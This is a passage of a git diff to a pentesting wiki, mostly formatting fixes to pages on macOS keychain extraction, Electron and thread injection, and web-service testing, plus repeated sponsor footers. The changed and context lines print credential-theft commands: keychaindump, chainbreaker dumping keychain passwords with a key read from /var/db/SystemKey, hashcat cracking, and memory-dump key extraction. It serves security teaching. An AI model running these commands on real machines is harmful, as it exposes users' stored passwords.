(comment)](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) it looks like these tools aren't working anymore in Big Sur. {% endhint %} -The attacker still needs to gain access to the system as well as escalate to **root** privileges in order to run **keychaindump**. This approach comes with its own conditions. As mentioned earlier, **upon login your keychain is unlocked by default** and remains unlocked while you use your system. This is for convenience so that the user doesn’t need to enter their password every time an application wishes to access the keychain. If the user has changed this setting and chosen to lock the keychain after every use, keychaindump will no longer work; it relies on an unlocked keychain to function. +### Keychaindump Overview -It’s important to understand how Keychaindump extracts passwords out of memory. The most important process in this transaction is the ”**securityd**β€œ **process**. Apple refers to this process as a **security context daemon for authorization and cryptographic operations**. The Apple developer libraries don’t say a whole lot about it; however, they do tell us that securityd handles access to the keychain. In his research, Juuso refers to the **key needed to decrypt the keychain as ”The Master Keyβ€œ**. A number of steps need to be taken to acquire this key as it is derived from the user’s OS X login password. If you want to read the keychain file you must have this master key. The following steps can be done to acquire it. **Perform a scan of securityd’s heap (keychaindump does this with the vmmap command)**. Possible master keys are stored in an area flagged as MALLOC\_TINY. You can see the locations of these heaps yourself with the following command: +A tool named **keychaindump** has been developed to extract passwords from macOS keychains, but it faces limitations on newer macOS versions like Big Sur, as indicated in a [discussion](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760). The use of **keychaindump** requires the attacker to gain access and escalate privileges to **root**. The tool exploits the fact that the keychain is unlocked by default upon user login for convenience, allowing applications to access it without requiring the user's password repeatedly. However, if a user opts to lock their keychain after each use, **keychaindump** becomes ineffective. + +**Keychaindump** operates by targeting a specific process called **securityd**, described by Apple as a daemon for authorization and cryptographic operations, crucial for accessing the keychain. The extraction process involves identifying a **Master Key** derived from the user's login password. This key is essential for reading the keychain file. To locate the **Master Key**, **keychaindump** scans the memory heap of **securityd** using the `vmmap` command, looking for potential keys within areas flagged as `MALLOC_TINY`. The following command is used to inspect these memory locations: ```bash sudo vmmap | grep MALLOC_TINY ``` -**Keychaindump** will then search the returned heaps for occurrences of 0x0000000000000018. If the following 8-byte value points to the current heap, we’ve found a potential master key. From here a bit of deobfuscation still needs to occur which can be seen in the source code, but as an analyst the most important part to note is that the necessary data to decrypt this information is stored in securityd’s process memory. Here’s an example of keychain dump output. +After identifying potential master keys, **keychaindump** searches through the heaps for a specific pattern (`0x0000000000000018`) that indicates a candidate for the master key. Further steps, including deobfuscation, are required to utilize this key, as outlined in **keychaindump**'s source code. Analysts focusing on this area should note that the crucial data for decrypting the keychain is stored within the memory of the **securityd** process. An example command to run **keychaindump** is: ```bash sudo ./keychaindump ``` + ### chainbreaker [**Chainbreaker**](https://github.com/n0fate/chainbreaker) can be used to extract the following types of information from an OSX keychain in a forensically sound manner: @@ -87,14 +90,14 @@ Given the keychain unlock password, a master key obtained using [volafox](https: Without one of these methods of unlocking the Keychain, Chainbreaker will display all other available information. -### **Dump keychain keys** +#### **Dump keychain keys** ```bash #Dump all keys of the keychain (without the passwords) python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain ``` -### **Dump keychain keys (with passwords) with SystemKey** +#### **Dump keychain keys (with passwords) with SystemKey** ```bash # First, get the keychain decryption key @@ -104,7 +107,7 @@ hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain ``` -### **Dump keychain keys (with passwords) cracking the hash** +#### **Dump keychain keys (with passwords) cracking the hash** ```bash # Get the keychain hash @@ -115,7 +118,7 @@ hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain ``` -### **Dump keychain keys (with passwords) with memory dump** +#### **Dump keychain keys (with passwords) with memory dump** [Follow these steps](..#dumping-memory-with-osxpmem) to perform a **memory dump** @@ -128,7 +131,7 @@ python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain ``` -### **Dump keychain keys (with passwords) using users password** +#### **Dump keychain keys (with passwords) using users password** If you know the users password you can use it to **dump and decrypt keychains that belong to the user**. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md index 223d61590..8c91fa295 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md @@ -14,7 +14,7 @@ Other ways to support HackTricks:
-**For further detail about the technique check the original post from: [https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/)**. Here is a summary: +**For further detail about the technique check the original post from: [https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/).** Here is a summary: NIB files, part of Apple's development ecosystem, are intended for defining **UI elements** and their interactions in applications. They encompass serialized objects such as windows and buttons, and are loaded at runtime. Despite their ongoing usage, Apple now advocates for Storyboards for more comprehensive UI flow visualization. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md index aa6b95946..386fe732b 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md @@ -194,7 +194,7 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/ {% endcode %} {% hint style="danger" %} -If the fuse\*\*`EnableNodeCliInspectArguments`\*\* is disabled, the app will **ignore node parameters** (such as `--inspect`) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set, which will be also **ignored** if the fuse **`RunAsNode`** is disabled. +If the fuse **`EnableNodeCliInspectArguments`** is disabled, the app will **ignore node parameters** (such as `--inspect`) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set, which will be also **ignored** if the fuse **`RunAsNode`** is disabled. However, you could still use the **electron param `--remote-debugging-port=9229`** but the previous payload won't work to execute other processes. {% endhint %} diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md index 660f3772e..736ac59c0 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md @@ -84,18 +84,18 @@ A scan of common libraries revealed appropriate candidates for these operations: 1. **Reading Memory:** The `property_getName()` function from the [Objective-C runtime library](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) is identified as a suitable function for reading memory. The function is outlined below: - ```c - const char *property_getName(objc_property_t prop) { - return prop->name; - } - ``` +```c +const char *property_getName(objc_property_t prop) { + return prop->name; +} +``` This function effectively acts like the `read_func` by returning the first field of `objc_property_t`. 2. **Writing Memory:** Finding a pre-built function for writing memory is more challenging. However, the `_xpc_int64_set_value()` function from libxpc is a suitable candidate with the following disassembly: -``` +```c __xpc_int64_set_value: str x1, [x0, #0x18] ret @@ -179,7 +179,7 @@ This comprehensive control is encapsulated within the [threadexec](https://githu By adhering to these guidelines and utilizing the `threadexec` library, one can efficiently manage and interact with processes at a granular level, achieving full control over the target process. # References -* https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/ +* [https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/](https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/)
diff --git a/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/network-services-pentesting/pentesting-snmp/cisco-snmp.md index 46684f883..9de8c0107 100644 --- a/network-services-pentesting/pentesting-snmp/cisco-snmp.md +++ b/network-services-pentesting/pentesting-snmp/cisco-snmp.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
@@ -60,7 +60,7 @@ msf6 auxiliary(scanner/snmp/snmp_enum) > exploit * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/network-services-pentesting/pentesting-web/buckets/firebase-database.md index 84e7a82a9..65ad99b29 100644 --- a/network-services-pentesting/pentesting-web/buckets/firebase-database.md +++ b/network-services-pentesting/pentesting-web/buckets/firebase-database.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -27,7 +27,7 @@ Learn more about Firebase in: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md b/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md index 0e738d434..97a46c7a3 100644 --- a/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md +++ b/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -58,7 +58,7 @@ You can **escalate privileges** using the **Potatoes** or **PrintSpoofer** for e * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md index 73f9bbd28..dbb79501d 100644 --- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md +++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -77,7 +77,7 @@ Exploit: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/network-services-pentesting/pentesting-web/joomla.md b/network-services-pentesting/pentesting-web/joomla.md index 5d9f26331..503e1c313 100644 --- a/network-services-pentesting/pentesting-web/joomla.md +++ b/network-services-pentesting/pentesting-web/joomla.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -120,7 +120,7 @@ If you managed to get **admin credentials** you can **RCE inside of it** by addi * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/network-services-pentesting/pentesting-web/laravel.md b/network-services-pentesting/pentesting-web/laravel.md index 0b109c57a..11e43f4f4 100644 --- a/network-services-pentesting/pentesting-web/laravel.md +++ b/network-services-pentesting/pentesting-web/laravel.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -116,7 +116,7 @@ Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md index 8c319650e..41b381aaf 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -244,7 +244,7 @@ function pwn($cmd) { * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/network-services-pentesting/pentesting-web/tomcat.md b/network-services-pentesting/pentesting-web/tomcat.md index 4fa1aed7b..807247217 100644 --- a/network-services-pentesting/pentesting-web/tomcat.md +++ b/network-services-pentesting/pentesting-web/tomcat.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by 